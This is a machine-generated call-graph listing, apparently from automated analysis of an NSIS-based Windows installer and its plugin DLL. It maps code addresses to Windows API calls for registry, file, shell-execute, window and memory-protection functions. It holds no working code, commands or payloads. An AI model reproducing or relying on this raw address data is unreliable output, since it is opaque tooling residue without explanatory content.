5207->5208 5209 6e312808 5207->5209 5208->5209 5209->5140 5211 6e312b4d 5210->5211 5212 6e312b52 GetLastError 5211->5212 5213 6e312b5d 5211->5213 5212->5213 5213->5145 5214->5168 5216 6e31138a 5215->5216 5217 6e3113ac 5215->5217 5216->5217 5218 6e311390 lstrcpyW 5216->5218 5217->5168 5218->5217 5219->5173 5459 402b5e 5460 402bb0 5459->5460 5461 402b65 5459->5461 5463 406a76 5 API calls 5460->5463 5462 402bae 5461->5462 5464 402d89 21 API calls 5461->5464 5465 402bb7 5463->5465 5467 402b73 5464->5467 5466 402dab 21 API calls 5465->5466 5468 402bc0 5466->5468 5469 402d89 21 API calls 5467->5469 5468->5462 5470 402bc4 IIDFromString 5468->5470 5472 402b7f 5469->5472 5470->5462 5471 402bd3 5470->5471 5471->5462 5477 406682 lstrcpynW 5471->5477 5476 4065c9 wsprintfW 5472->5476 5475 402bf0 CoTaskMemFree 5475->5462 5476->5462 5477->5475 5478 402a60 5479 402d89 21 API calls 5478->5479 5480 402a66 5479->5480 5481 402aa9 5480->5481 5482 402a8d 5480->5482 5490 402933 5480->5490 5485 402ac3 5481->5485 5486 402ab3 5481->5486 5483 402a92 5482->5483 5484 402aa3 5482->5484 5492 406682 lstrcpynW 5483->5492 5493 4065c9 wsprintfW 5484->5493 5488 4066bf 21 API calls 5485->5488 5487 402d89 21 API calls 5486->5487 5487->5490 5488->5490 5492->5490 5493->5490 4313 401761 4319 402dab 4313->4319 4317 40176f 4318 4061a1 2 API calls 4317->4318 4318->4317 4320 402db7 4319->4320 4321 4066bf 21 API calls 4320->4321 4322 402dd8 4321->4322 4323 401768 4322->4323 4324 406930 5 API calls 4322->4324 4325 4061a1 4323->4325 4324->4323 4326 4061ae GetTickCount GetTempFileNameW 4325->4326 4327 4061e8 4326->4327 4328 4061e4 4326->4328 4327->4317 4328->4326 4328->4327 5494 401d62 5495 402d89 21 API calls 5494->5495 5496 401d73 SetWindowLongW 5495->5496 5497 402c2f 5496->5497 5498 4028e3 5499 4028eb 5498->5499 5500 4028ef FindNextFileW 5499->5500 5502 402901 5499->5502 5501 402948 5500->5501 5500->5502 5504 406682 lstrcpynW 5501->5504 5504->5502 5505 401568 5506 402ba9 5505->5506 5509 4065c9 wsprintfW 5506->5509 5508 402bae 5509->5508 5517 40196d 5518 402d89 21 API calls 5517->5518 5519 401974 5518->5519 5520 402d89 21 API calls 5519->5520 5521 401981 5520->5521 5522 402dab 21 API calls 5521->5522 5523 401998 lstrlenW 5522->5523 5525 4019a9 5523->5525 5524 4019ea 5525->5524 5529 406682 lstrcpynW 5525->5529 5527 4019da 5527->5524 5528 4019df lstrlenW 5527->5528 5528->5524 5529->5527 5530 40506e GetDlgItem GetDlgItem 5531 4050c0 7 API calls 5530->5531 5541 4052e5 5530->5541 5532 405167 DeleteObject 5531->5532 5533 40515a SendMessageW 5531->5533 5534 405170 5532->5534 5533->5532 5535 4051a7 5534->5535 5536 4066bf 21 API calls 5534->5536 5537 404601 22 API calls 5535->5537 5542 405189 SendMessageW SendMessageW 5536->5542 5543 4051bb 5537->5543 5538 405473 5539 405485 5538->5539 5540 40547d SendMessageW 5538->5540 5552 405497 ImageList_Destroy 5539->5552 5553 40549e 5539->5553 5558 4054ae 5539->5558 5540->5539 5544 4053c7 5541->5544 5564 405354 5541->5564 5584 404fbc SendMessageW 5541->5584 5542->5534 5549 404601 22 API calls 5543->5549 5544->5538 5545 405420 SendMessageW 5544->5545 5573 4052d8 5544->5573 5550 405435 SendMessageW 5545->5550 5545->5573 5546 4053b9 SendMessageW 5546->5544 5547 404668 8 API calls 5551 405674 5547->5551 5561 4051cc 5549->5561 5555 405448 5550->5555 5552->5553 5557 4054a7 GlobalFree 5553->5557 5553->5558 5554 4052a7 GetWindowLongW SetWindowLongW 5560 4052c0 5554->5560 5566 405459 SendMessageW 5555->5566 5556 405628 5559 40563a ShowWindow GetDlgItem ShowWindow 5556->5559 5556->5573 5557->5558 5558->5556 5577 4054e9 5558->5577 5589 40503c 5558->5589 5559->5573 5562 4052c5 ShowWindow 5560->5562 5563 4052dd 5560->5563 5561->5554 5565 40521f SendMessageW 5561->5565 5567 4052a2 5561->5567 5570 405271 SendMessageW 5561->5570 5571 40525d SendMessageW 5561->5571 5582 404636 SendMessageW 5562->5582 5583 404636 SendMessageW 5563->5583 5564->5544 5564->5546 5565->5561 5566->5538 5567->5554 5567->5560 5570->5561 5571->5561 5573->5547 5574 4055f3 5575 4055fe InvalidateRect 5574->5575 5578 40560a 5574->5578 5575->5578 5576 405517 SendMessageW 5581 40552d 5576->5581 5577->5576 5577->5581 5578->5556 5598 404f77 5578->5598 5580 4055a1 SendMessageW SendMessageW 5580->5581 5581->5574 5581->5580 5582->5573 5583->5541 5585 40501b SendMessageW 5584->5585 5586 404fdf GetMessagePos ScreenToClient SendMessageW 5584->5586 5587 405013 5585->5587 5586->5587 5588 405018 5586->5588 5587->5564 5588->5585 5601 406682 lstrcpynW 5589->5601 5591 40504f 5602 4065c9 wsprintfW 5591->5602 5593 405059 5594 40140b 2 API calls 5593->5594 5595 405062 5594->5595 5603 406682 lstrcpynW 5595->5603 5597 405069 5597->5577 5604 404eae 5598->5604 5600 404f8c 5600->5556 5601->5591 5602->5593 5603->5597 5605 404ec7 5604->5605 5606 4066bf 21 API calls 5605->5606 5607 404f2b 5606->5607 5608 4066bf 21 API calls 5607->5608 5609 404f36 5608->5609 5610 4066bf 21 API calls 5609->5610 5611 404f4c lstrlenW wsprintfW SetDlgItemTextW 5610->5611 5611->5600 5612 40166f 5613 402dab 21 API calls 5612->5613 5614 401675 5613->5614 5615 4069df 2 API calls 5614->5615 5616 40167b 5615->5616 5617 402af0 5618 402d89 21 API calls 5617->5618 5619 402af6 5618->5619 5620 4066bf 21 API calls 5619->5620 5621 402933 5619->5621 5620->5621 4903 4026f1 4904 402d89 21 API calls 4903->4904 4907 402700 4904->4907 4905 40283d 4906 40274a ReadFile 4906->4905 4906->4907 4907->4905 4907->4906 4908 4027e3 4907->4908 4909 4061f5 ReadFile 4907->4909 4910 40278a MultiByteToWideChar 4907->4910 4911 40283f 4907->4911 4914 4027b0 SetFilePointer MultiByteToWideChar 4907->4914 4915 402850 4907->4915 4908->4905 4908->4907 4917 406253 SetFilePointer 4908->4917 4909->4907 4910->4907 4926 4065c9 wsprintfW 4911->4926 4914->4907 4915->4905 4916 402871 SetFilePointer 4915->4916 4916->4905 4918 40626f 4917->4918 4921 406287 4917->4921 4919 4061f5 ReadFile 4918->4919 4920 40627b 4919->4920 4920->4921 4922 406290 SetFilePointer 4920->4922 4923 4062b8 SetFilePointer 4920->4923 4921->4908 4922->4923 4924 40629b 4922->4924 4923->4921 4925 406224 WriteFile 4924->4925 4925->4921 4926->4905 5622 6e311000 5623 6e31101b 5 API calls 5622->5623 5624 6e311019 5623->5624 5625 404771 lstrlenW 5626 404790 5625->5626 5627 404792 WideCharToMultiByte 5625->5627 5626->5627 5628 404af2 5629 404b1e 5628->5629 5630 404b2f 5628->5630 5689 405cc6 GetDlgItemTextW 5629->5689 5632 404b3b GetDlgItem 5630->5632 5638 404b9a 5630->5638 5634 404b4f 5632->5634 5633 404b29 5636 406930 5 API calls 5633->5636 5637 404b63 SetWindowTextW 5634->5637 5641 405ffc 4 API calls 5634->5641 5635 404c7e 5687 404e2d 5635->5687 5691 405cc6 GetDlgItemTextW 5635->5691 5636->5630 5642 404601 22 API calls 5637->5642 5638->5635 5643 4066bf 21 API calls 5638->5643 5638->5687 5640 404668 8 API calls 5645 404e41 5640->5645 5646 404b59 5641->5646 5647 404b7f 5642->5647 5648 404c0e SHBrowseForFolderW 5643->5648 5644 404cae 5649 406059 18 API calls 5644->5649 5646->5637 5655 405f51 3 API calls 5646->5655 5650 404601 22 API calls 5647->5650 5648->5635 5651 404c26 CoTaskMemFree 5648->5651 5652 404cb4 5649->5652 5653 404b8d 5650->5653 5654 405f51 3 API calls 5651->5654 5692 406682 lstrcpynW 5652->5692 5690 404636 SendMessageW 5653->5690 5657 404c33 5654->5657 5655->5637 5660 404c6a SetDlgItemTextW 5657->5660 5664 4066bf 21 API calls 5657->5664 5659 404b93 5662 406a76 5 API calls 5659->5662 5660->5635 5661 404ccb 5663 406a76 5 API calls 5661->5663 5662->5638 5675 404cd2 5663->5675 5665 404c52 lstrcmpiW 5664->5665 5665->5660 5668 404c63 lstrcatW 5665->5668 5666 404d13 5693 406682 lstrcpynW 5666->5693 5668->5660 5669 404d1a 5670 405ffc 4 API calls 5669->5670 5671 404d20 GetDiskFreeSpaceW 5670->5671 5673 404d44 MulDiv 5671->5673 5677 404d6b 5671->5677 5673->5677 5674 405f9d 2 API calls 5674->5675 5675->5666 5675->5674 5675->5677 5676 404ddc 5679 404dff 5676->5679 5681 40140b 2 API calls 5676->5681 5677->5676 5678 404f77 24 API calls 5677->5678 5680 404dc9 5678->5680 5694 404623 EnableWindow 5679->5694 5683 404dde SetDlgItemTextW 5680->5683 5684 404dce 5680->5684 5681->5679 5683->5676 5686 404eae 24 API calls 5684->5686 5685 404e1b 5685->5687 5688 404a4b SendMessageW 5685->5688 5686->5676 5687->5640 5688->5687 5689->5633 5690->5659 5691->5644 5692->5661 5693->5669 5694->5685 4927 401774 4928 402dab 21 API calls 4927->4928 4929 40177b 4928->4929 4930 4017a3 4929->4930 4931 40179b 4929->4931 4968 406682 lstrcpynW 4930->4968 4967 406682 lstrcpynW 4931->4967 4934 4017a1 4938 406930 5 API calls 4934->4938 4935 4017ae 4936 405f51 3 API calls 4935->4936 4937 4017b4 lstrcatW 4936->4937 4937->4934 4945 4017c0 4938->4945 4939 4069df 2 API calls 4939->4945 4940 4017fc 4941 40614d 2 API calls 4940->4941 4941->4945 4943 4017d2 CompareFileTime 4943->4945 4944 401892 4946 405707 28 API calls 4944->4946 4945->4939 4945->4940 4945->4943 4945->4944 4948 406682 lstrcpynW 4945->4948 4954 4066bf 21 API calls 4945->4954 4962 405ce2 MessageBoxIndirectW 4945->4962 4965 401869 4945->4965 4966 406172 GetFileAttributesW CreateFileW 4945->4966 4949 40189c 4946->4949 4947 405707 28 API calls 4953 40187e 4947->4953 4948->4945 4950 403376 48 API calls 4949->4950 4952 4018af 4950->4952 4951 4018c3 SetFileTime 4955 4018d5 CloseHandle 4951->4955 4952->4951 4952->4955 4954->4945 4955->4953 4956 4018e6 4955->4956 4957 4018eb 4956->4957 4958 4018fe 4956->4958 4960 4066bf 21 API calls 4957->4960 4959 4066bf 21 API calls 4958->4959 4961 401906 4959->4961 4963 4018f3 lstrcatW 4960->4963 4961->4953 4964 405ce2 MessageBoxIndirectW 4961->4964 4962->4945 4963->4961 4964->4953 4965->4947 4965->4953 4966->4945 4967->4934 4968->4935 5695 4014f5 SetForegroundWindow 5696 402c2f 5695->5696 5697 401a77 5698 402d89 21 API calls 5697->5698 5699 401a80 5698->5699 5700 402d89 21 API calls 5699->5700 5701 401a25 5700->5701 5702 401578 5703 401591 5702->5703 5704 401588 ShowWindow 5702->5704 5705 40159f ShowWindow 5703->5705 5706 402c2f 5703->5706 5704->5703 5705->5706 5019 4023f9 5020 402dab 21 API calls 5019->5020 5021 402408 5020->5021 5022 402dab 21 API calls 5021->5022 5023 402411 5022->5023 5024 402dab 21 API calls 5023->5024 5025 40241b GetPrivateProfileStringW 5024->5025 5707 40567b 5708 40568b 5707->5708 5709 40569f 5707->5709 5710 405691 5708->5710 5719 4056e8 5708->5719 5711 4056a7 IsWindowVisible 5709->5711 5715 4056be 5709->5715 5713 40464d SendMessageW 5710->5713 5714 4056b4 5711->5714 5711->5719 5712 4056ed CallWindowProcW 5716 40569b 5712->5716 5713->5716 5717 404fbc 5 API calls 5714->5717 5715->5712 5718 40503c 4 API calls 5715->5718 5717->5715 5718->5719 5719->5712 5720 401ffb 5721 402dab 21 API calls 5720->5721 5722 402002 5721->5722 5723 4069df 2 API calls 5722->5723 5724 402008 5723->5724 5726 402019 5724->5726 5727 4065c9 wsprintfW 5724->5727 5727->5726 5728 401b7c 5729 402dab 21 API calls 5728->5729 5730 401b83 5729->5730 5731 402d89 21 API calls 5730->5731 5732 401b8c wsprintfW 5731->5732 5733 402c2f 5732->5733 5734 6e31170d 5735 6e3115b6 GlobalFree 5734->5735 5737 6e311725 5735->5737 5736 6e31176b GlobalFree 5737->5736 5738 6e311740 5737->5738 5739 6e311757 VirtualFree 5737->5739 5738->5736 5739->5736 5740 401000 5741 401037 BeginPaint GetClientRect 5740->5741 5742 40100c DefWindowProcW 5740->5742 5744 4010f3 5741->5744 5747 401179 5742->5747 5745 401073 CreateBrushIndirect FillRect DeleteObject 5744->5745 5746 4010fc 5744->5746 5745->5744 5748 401102 CreateFontIndirectW 5746->5748 5749 401167 EndPaint 5746->5749 5748->5749 5750 401112 6 API calls 5748->5750 5749->5747 5750->5749 5751 401680 5752 402dab 21 API calls 5751->5752 5753 401687 5752->5753 5754 402dab 21 API calls 5753->5754 5755 401690 5754->5755 5756 402dab 21 API calls 5755->5756 5757 401699 MoveFileW 5756->5757 5758 4016ac 5757->5758 5764 4016a5 5757->5764 5759 4069df 2 API calls 5758->5759 5762 4022fb 5758->5762 5761 4016bb 5759->5761 5760 401423 28 API calls 5760->5762 5761->5762 5763 406442 40 API calls 5761->5763 5763->5764 5764->5760 5765 404102 5766 40411a 5765->5766 5767 40427b 5765->5767 5766->5767 5768 404126 5766->5768 5769 4042cc 5767->5769 5770 40428c GetDlgItem GetDlgItem 5767->5770 5771 404131 SetWindowPos 5768->5771 5772 404144 5768->5772 5774 404326 5769->5774 5784 401389 2 API calls 5769->5784 5773 404601 22 API calls 5770->5773 5771->5772 5776 40414d ShowWindow 5772->5776 5777 40418f 5772->5777 5778 4042b6 SetClassLongW 5773->5778 5775 40464d SendMessageW 5774->5775 5791 404276 5774->5791 5806 404338 5775->5806 5779 404239 5776->5779 5780 40416d GetWindowLongW 5776->5780 5781 404197 DestroyWindow 5777->5781 5782 4041ae 5777->5782 5783 40140b 2 API calls 5778->5783 5785 404668 8 API calls 5779->5785 5780->5779 5786 404186 ShowWindow 5780->5786 5835 40458a 5781->5835 5787 4041b3 SetWindowLongW 5782->5787 5788 4041c4 5782->5788 5783->5769 5789 4042fe 5784->5789 5785->5791 5786->5777 5787->5791 5788->5779 5794 4041d0 GetDlgItem 5788->5794 5789->5774 5790 404302 SendMessageW 5789->5790 5790->5791 5792 40140b 2 API calls 5792->5806 5793 40458c DestroyWindow EndDialog 5793->5835 5796 4041e1 SendMessageW IsWindowEnabled 5794->5796 5797 4041fe 5794->5797 5795 4045bb ShowWindow 5795->5791 5796->5791 5796->5797 5799 40420b 5797->5799 5800 404252 SendMessageW 5797->5800 5801 40421e 5797->5801 5809 404203 5797->5809 5798 4066bf 21 API calls 5798->5806 5799->5800 5799->5809 5800->5779 5804 404226 5801->5804 5805 40423b 5801->5805 5802 4045da SendMessageW 5802->5779 5803 404601 22 API calls 5803->5806 5807 40140b 2 API calls 5804->5807 5808 40140b 2 API calls 5805->5808 5806->5791 5806->5792 5806->5793 5806->5798 5806->5803 5810 404601 22 API calls 5806->5810 5826 4044cc DestroyWindow 5806->5826 5807->5809 5808->5809 5809->5779 5809->5802 5811 4043b3 GetDlgItem 5810->5811 5812 4043d0 ShowWindow EnableWindow 5811->5812 5813 4043c8 5811->5813 5836 404623 EnableWindow 5812->5836 5813->5812 5815 4043fa EnableWindow 5820 40440e 5815->5820 5816 404413 GetSystemMenu EnableMenuItem SendMessageW 5817 404443 SendMessageW 5816->5817 5816->5820 5817->5820 5819 4040e3 22 API calls 5819->5820 5820->5816 5820->5819 5837 404636 SendMessageW 5820->5837 5838 406682 lstrcpynW 5820->5838 5822 404472 lstrlenW 5823 4066bf 21 API calls 5822->5823 5824 404488 SetWindowTextW 5823->5824 5825 401389 2 API calls 5824->5825 5825->5806 5827 4044e6 CreateDialogParamW 5826->5827 5826->5835 5828 404519 5827->5828 5827->5835 5829 404601 22 API calls 5828->5829 5830 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5829->5830 5831 401389 2 API calls 5830->5831 5832 40456a 5831->5832 5832->5791 5833 404572 ShowWindow 5832->5833 5834 40464d SendMessageW 5833->5834 5834->5835 5835->5791 5835->5795 5836->5815 5837->5820 5838->5822 5839 401503 5840 401508 5839->5840 5842 401520 5839->5842 5841 402d89 21 API calls 5840->5841 5841->5842 5843 401a04 5844 402dab 21 API calls 5843->5844 5845 401a0b 5844->5845 5846 402dab 21 API calls 5845->5846 5847 401a14 5846->5847 5848 401a1b lstrcmpiW 5847->5848 5849 401a2d lstrcmpW 5847->5849 5850 401a21 5848->5850 5849->5850 5851 402304 5852 402dab 21 API calls 5851->5852 5853 40230a 5852->5853 5854 402dab 21 API calls 5853->5854 5855 402313 5854->5855 5856 402dab 21 API calls 5855->5856 5857 40231c 5856->5857 5858 4069df 2 API calls 5857->5858 5859 402325 5858->5859 5860 402336 lstrlenW lstrlenW 5859->5860 5861 402329 5859->5861 5863 405707 28 API calls 5860->5863 5862 405707 28 API calls 5861->5862 5865 402331 5861->5865 5862->5865 5864 402374 SHFileOperationW 5863->5864 5864->5861 5864->5865 5873 6e311774 5874 6e3117a3 5873->5874 5875 6e311bff 22 API calls 5874->5875 5876 6e3117aa 5875->5876 5877 6e3117b1 5876->5877 5878 6e3117bd 5876->5878 5879 6e311312 2 API calls 5877->5879 5880 6e3117e4 5878->5880 5881 6e3117c7 5878->5881 5887 6e3117bb 5879->5887 5882 6e3117ea 5880->5882 5883 6e31180e 5880->5883 5884 6e3115dd 3 API calls 5881->5884 5885 6e311654 3 API calls 5882->5885 5886 6e3115dd 3 API calls 5883->5886 5888 6e3117cc 5884->5888 5889 6e3117ef 5885->5889 5886->5887 5890 6e311654 3 API calls 5888->5890 5891 6e311312 2 API calls 5889->5891 5892 6e3117d2 5890->5892 5894 6e3117f5 GlobalFree 5891->5894 5893 6e311312 2 API calls 5892->5893 5895 6e3117d8 GlobalFree 5893->5895 5894->5887 5896 6e311809 GlobalFree 5894->5896 5895->5887 5896->5887 5897 401d86 5898 401d99 GetDlgItem 5897->5898 5899 401d8c 5897->5899 5901 401d93 5898->5901 5900 402d89 21 API calls 5899->5900 5900->5901 5902 401dda GetClientRect LoadImageW SendMessageW 5901->5902 5904 402dab 21 API calls 5901->5904 5905 401e38 5902->5905 5907 401e44 5902->5907 5904->5902 5906 401e3d DeleteObject 5905->5906 5905->5907 5906->5907 5908 6e311979 5909 6e31199c 5908->5909 5910 6e3119d1 GlobalFree 5909->5910 5911 6e3119e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5909->5911 5910->5911 5912 6e311312 2 API calls 5911->5912 5913 6e311b6e GlobalFree GlobalFree 5912->5913 5914 402388 5915 40238f 5914->5915 5918 4023a2 5914->5918 5916 4066bf 21 API calls 5915->5916 5917 40239c 5916->5917 5917->5918 5919 405ce2 MessageBoxIndirectW 5917->5919 5919->5918 4850 401389 4852 401390 4850->4852 4851 4013fe 4852->4851 4853 4013cb MulDiv SendMessageW 4852->4853 4853->4852 5920 402c0a SendMessageW 5921 402c24 InvalidateRect 5920->5921 5922 402c2f 5920->5922 5921->5922 4875 6e312a7f 4876 6e312acf 4875->4876 4877 6e312a8f VirtualProtect 4875->4877 4877->4876 4878 40248f 4879 402dab 21 API calls 4878->4879 4880 4024a1 4879->4880 4881 402dab 21 API calls 4880->4881 4882 4024ab 4881->4882 4895 402e3b 4882->4895 4885 402c2f 4886 4024e3 4888 4024ef 4886->4888 4889 402d89 21 API calls 4886->4889 4887 402dab 21 API calls 4891 4024d9 lstrlenW 4887->4891 4890 40250e RegSetValueExW 4888->4890 4892 403376 48 API calls 4888->4892 4889->4888 4893 402524 RegCloseKey 4890->4893 4891->4886 4892->4890 4893->4885 4896 402e56 4895->4896 4899 40651d 4896->4899 4900 40652c 4899->4900 4901 4024bb 4900->4901 4902 406537 RegCreateKeyExW 4900->4902 4901->4885 4901->4886 4901->4887 4902->4901 5923 402910 5924 402dab 21 API calls 5923->5924 5925 402917 FindFirstFileW 5924->5925 5926 40293f 5925->5926 5930 40292a 5925->5930 5927 402948 5926->5927 5931 4065c9 wsprintfW 5926->5931 5932 406682 lstrcpynW 5927->5932 5931->5927 5932->5930 5933 6e3110e1 5934 6e311111 5933->5934 5935 6e3112b0 GlobalFree 5934->5935 5936 6e3111d7 GlobalAlloc 5934->5936 5937 6e311240 GlobalFree 5934->5937 5938 6e31135a 2 API calls 5934->5938 5939 6e3112ab 5934->5939 5940 6e311312 2 API calls 5934->5940 5941 6e31129a GlobalFree 5934->5941 5942 6e31116b GlobalAlloc 5934->5942 5943 6e311381 lstrcpyW 5934->5943 5936->5934 5937->5934 5938->5934 5939->5935 5940->5934 5941->5934 5942->5934 5943->5934 5944 401911 5945 401948 5944->5945 5946 402dab 21 API calls 5945->5946 5947 40194d 5946->5947 5948 405d8e 71 API calls 5947->5948 5949 401956 5948->5949 5950 401491 5951 405707 28 API calls 5950->5951 5952 401498 5951->5952 5953 403d12 5954 403d1d 5953->5954 5955 403d21 5954->5955 5956 403d24 GlobalAlloc 5954->5956 5956->5955 5964 401914 5965 402dab 21 API calls 5964->5965 5966 40191b 5965->5966 5967 405ce2 MessageBoxIndirectW 5966->5967 5968 401924 5967->5968 4969 402896 4970 40289d 4969->4970 4972 402bae 4969->4972 4971 402d89 21 API calls 4970->4971 4973 4028a4 4971->4973 4974 4028b3 SetFilePointer 4973->4974 4974->4972 4975 4028c3 4974->4975 4977 4065c9 wsprintfW 4975->4977 4977->4972 5969 401f17 5970 402dab 21 API calls 5969->5970 5971 401f1d 5970->5971 5972 402dab 21 API calls 5971->5972 5973 401f26 5972->5973 5974 402dab 21 API calls 5973->5974 5975 401f2f 5974->5975 5976 402dab 21 API calls 5975->5976 5977 401f38 5976->5977 5978 401423 28 API calls 5977->5978 5979 401f3f 5978->5979 5986 405ca8 ShellExecuteExW 5979->5986 5981 401f87 5982 406b21 5 API calls 5981->5982 5983 402933 5981->5983 5984 401fa4 CloseHandle 5982->5984 5984->5983 5986->5981 5987 402f98 5988 402fc3 5987->5988 5989 402faa SetTimer 5987->5989 5990 403011 5988->5990 5991 403017 MulDiv 5988->5991 5989->5988 5992 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 5991->5992 5992->5990 5994 6e3123e9 5995 6e312453 5994->5995 5996 6e31247d 5995->5996 5997 6e31245e GlobalAlloc 5995->5997 5997->5995 5998 401d1c 5999 402d89 21 API calls 5998->5999 6000 401d22 IsWindow 5999->6000 6001 401a25 6000->6001 6002 40149e 6003 4023a2 6002->6003 6004 4014ac PostQuitMessage 6002->6004 6004->6003 4235 401ba0 4236 401bf1 4235->4236 4237 401bad 4235->4237 4238 401bf6 4236->4238 4239 401c1b GlobalAlloc 4236->4239 4240 401c36 4237->4240 4243 401bc4 4237->4243 4248 4023a2 4238->4248 4273 406682 lstrcpynW 4238->4273 4254 4066bf 4239->4254 4241 4066bf 21 API calls 4240->4241 4240->4248 4247 40239c 4241->4247 4271 406682 lstrcpynW 4243->4271 4246 401c08 GlobalFree 4246->4248 4247->4248 4274 405ce2 4247->4274 4249 401bd3 4272 406682 lstrcpynW 4249->4272 4252 401be2 4278 406682 lstrcpynW 4252->4278 4258 4066ca 4254->4258 4255 406911 4256 40692a 4255->4256 4301 406682 lstrcpynW 4255->4301 4256->4240 4258->4255 4259 4068e2 lstrlenW 4258->4259 4260 4067db GetSystemDirectoryW 4258->4260 4261 4066bf 15 API calls 4258->4261 4265 4067f1 GetWindowsDirectoryW 4258->4265 4266 406883 lstrcatW 4258->4266 4268 4066bf 15 API calls 4258->4268 4270 406853 SHGetPathFromIDListW CoTaskMemFree 4258->4270 4279 406550 4258->4279 4284 406a76 GetModuleHandleA 4258->4284 4290 406930 4258->4290 4299 4065c9 wsprintfW 4258->4299 4300 406682 lstrcpynW 4258->4300 4259->4258 4260->4258 4261->4259 4265->4258 4266->4258 4268->4258 4270->4258 4271->4249 4272->4252 4273->4246 4276 405cf7 4274->4276 4275 405d43 4275->4248 4276->4275 4277 405d0b MessageBoxIndirectW 4276->4277 4277->4275 4278->4248 4302 4064ef 4279->4302 4282 4065b4 4282->4258 4283 406584 RegQueryValueExW RegCloseKey 4283->4282 4285 406a92 4284->4285 4286 406a9c GetProcAddress 4284->4286 4306 406a06 GetSystemDirectoryW 4285->4306 4288 406aab 4286->4288 4288->4258 4289 406a98 4289->4286 4289->4288 4297 40693d 4290->4297 4291 4069b3 4292 4069b8 CharPrevW 4291->4292 4294 4069d9 4291->4294 4292->4291 4293 4069a6 CharNextW 4293->4291 4293->4297 4294->4258 4296 406992 CharNextW 4296->4297 4297->4291 4297->4293 4297->4296 4298 4069a1 CharNextW 4297->4298 4309 405f7e 4297->4309 4298->4293 4299->4258 4300->4258 4301->4256 4303 4064fe 4302->4303 4304 406502 4303->4304 4305 406507 RegOpenKeyExW 4303->4305 4304->4282 4304->4283 4305->4304 4307 406a28 wsprintfW LoadLibraryExW 4306->4307 4307->4289 4310 405f84 4309->4310 4311 405f9a 4310->4311 4312 405f8b CharNextW 4310->4312 4311->4297 4312->4310 6005 406da0 6007 406c24 6005->6007 6006 40758f 6007->6006 6008 406ca5 GlobalFree 6007->6008 6009 406cae GlobalAlloc 6007->6009 6010 406d25 GlobalAlloc 6007->6010 6011 406d1c GlobalFree 6007->6011 6008->6009 6009->6006 6009->6007 6010->6006 6010->6007 6011->6010 6012 402621 6013 402dab 21 API calls 6012->6013 6014 402628 6013->6014 6017 406172 GetFileAttributesW CreateFileW 6014->6017 6016 402634 6017->6016 4329 4025a3 4341 402deb 4329->4341 4333 4025b6 4334 4025c5 4333->4334 4338 402933 4333->4338 4335 4025d2 RegEnumKeyW 4334->4335 4336 4025de RegEnumValueW 4334->4336 4339 4025fa RegCloseKey 4335->4339 4337 4025f3 4336->4337 4336->4339 4337->4339 4339->4338 4342 402dab 21 API calls 4341->4342 4343 402e02 4342->4343 4344 4064ef RegOpenKeyExW 4343->4344 4345 4025ad 4344->4345 4346 402d89 4345->4346 4347 4066bf 21 API calls 4346->4347 4348 402d9e 4347->4348 4348->4333 6018 4015a8 6019 402dab 21 API calls 6018->6019 6020 4015af SetFileAttributesW 6019->6020 6021 4015c1 6020->6021 4854 401fa9 4855 402dab 21 API calls 4854->4855 4856 401faf 4855->4856 4857 405707 28 API calls 4856->4857 4858 401fb9 4857->4858 4859 405c65 2 API calls 4858->4859 4860 401fbf 4859->4860 4861 401fe2 CloseHandle 4860->4861 4864 402933 4860->4864 4869 406b21 WaitForSingleObject 4860->4869 4861->4864 4865 401fd4 4866 401fe4 4865->4866 4867 401fd9 4865->4867 4866->4861 4874 4065c9 wsprintfW 4867->4874 4870 406b3b 4869->4870 4871 406b4d GetExitCodeProcess 4870->4871 4872 406ab2 2 API calls 4870->4872 4871->4865 4873 406b42 WaitForSingleObject 4872->4873 4873->4870 4874->4861 6022 6e311058 6024 6e311074 6022->6024 6023 6e3110dd 6024->6023 6025 6e3115b6 GlobalFree 6024->6025 6026 6e311092 6024->6026 6025->6026 6027 6e3115b6 GlobalFree 6026->6027 6028 6e3110a2 6027->6028 6029 6e3110b2 6028->6029 6030 6e3110a9 GlobalSize 6028->6030 6031 6e3110b6 GlobalAlloc 6029->6031 6032 6e3110c7 6029->6032 6030->6029 6033 6e3115dd 3 API calls 6031->6033 6034 6e3110d2 GlobalFree 6032->6034 6033->6032 6034->6023 6042 404aab 6043 404ae1 6042->6043 6044 404abb 6042->6044 6046 404668 8 API calls 6043->6046 6045 404601 22 API calls 6044->6045 6047 404ac8 SetDlgItemTextW 6045->6047 6048 404aed 6046->6048 6047->6043 6049 40202f 6050 402dab 21 API calls 6049->6050 6051 402036 6050->6051 6052 406a76 5 API calls 6051->6052 6053 402045 6052->6053 6054 402061 GlobalAlloc 6053->6054 6055 4020d1 6053->6055 6054->6055 6056 402075 6054->6056 6057 406a76 5 API calls 6056->6057 6058 40207c 6057->6058 6059 406a76 5 API calls 6058->6059 6060 402086 6059->6060 6060->6055 6064 4065c9 wsprintfW 6060->6064 6062 4020bf 6065 4065c9 wsprintfW 6062->6065 6064->6062 6065->6055 6066 40252f 6067 402deb 21 API calls 6066->6067 6068 402539 6067->6068 6069 402dab 21 API calls 6068->6069 6070 402542 6069->6070 6071 40254d RegQueryValueExW 6070->6071 6073 402933 6070->6073 6072 40256d 6071->6072 6076 402573 RegCloseKey 6071->6076 6072->6076 6077 4065c9 wsprintfW 6072->6077 6076->6073 6077->6076 6078 4021af 6079 402dab 21 API calls 6078->6079 6080 4021b6 6079->6080 6081 402dab 21 API calls 6080->6081 6082 4021c0 6081->6082 6083 402dab 21 API calls 6082->6083 6084 4021ca 6083->6084 6085 402dab 21 API calls 6084->6085 6086 4021d4 6085->6086 6087 402dab 21 API calls 6086->6087 6088 4021de 6087->6088 6089 40221d CoCreateInstance 6088->6089 6090 402dab 21 API calls 6088->6090 6093 40223c 6089->6093 6090->6089 6091 401423 28 API calls 6092 4022fb 6091->6092 6093->6091 6093->6092 6094 6e312d43 6095 6e312d5b 6094->6095 6096 6e31162f 2 API calls 6095->6096 6097 6e312d76 6096->6097 6098 401a35 6099 402dab 21 API calls 6098->6099 6100 401a3e ExpandEnvironmentStringsW 6099->6100 6101 401a52 6100->6101 6103 401a65 6100->6103 6102 401a57 lstrcmpW 6101->6102 6101->6103 6102->6103 4978 4023b7 4979 4023bf 4978->4979 4982 4023c5 4978->4982 4980 402dab 21 API calls 4979->4980 4980->4982 4981 402dab 21 API calls 4983 4023d3 4981->4983 4982->4981 4982->4983 4984 402dab 21 API calls 4983->4984 4986 4023e1 4983->4986 4984->4986 4985 402dab 21 API calls 4987 4023ea 